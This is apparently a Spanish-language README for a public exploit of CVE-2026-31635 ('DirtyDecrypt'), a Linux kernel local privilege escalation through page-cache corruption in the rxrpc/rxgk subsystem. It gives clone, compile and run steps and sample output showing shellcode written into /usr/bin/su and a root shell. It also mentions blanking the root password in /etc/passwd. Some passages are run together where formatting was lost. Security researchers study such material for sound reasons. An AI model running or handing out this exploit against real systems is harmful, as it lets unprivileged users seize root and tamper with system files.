
CVE-2026-31635
Escalada de Privilegios Local del Kernel de Linux mediante Corrupción de Caché de Página RXGK
DirtyDecrypt (CVE-2026-31635) es una vulnerabilidad de escalada de privilegios local en el subsistema rxrpc del kernel de Linux (específicamente el componente rxgk).
Abusa de una verificación faltante de Copia en Escritura (COW) durante el descifrado AES-CBC, permitiendo a un usuario no privilegiado corromper la caché de página y lograr escrituras arbitrarias de archivos, lo que lleva a acceso root.
/etc/passwd (contraseña root en blanco)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGK habilitadoAF_RXRPCkeyctl (para claves rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
Salida exitosa esperada:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Exploit principal
├── README.md # Este archivo
├── Makefile # Opcional
└── exploit.log # Registro de salida opcional
AF_RXRPC + splice() para forzar páginas de caché de página en la ruta de descifrado RXGKskb_cow_data()/etc/passwd) byte por byte mediante técnica de ventana deslizanteEste exploit es solo para pruebas de seguridad educativas y autorizadas.
El uso no autorizado en sistemas que no posee es ilegal.
⭐ Dale estrella a este repositorio si te ayudó!
Hecho con ❤️ para la comunidad de investigación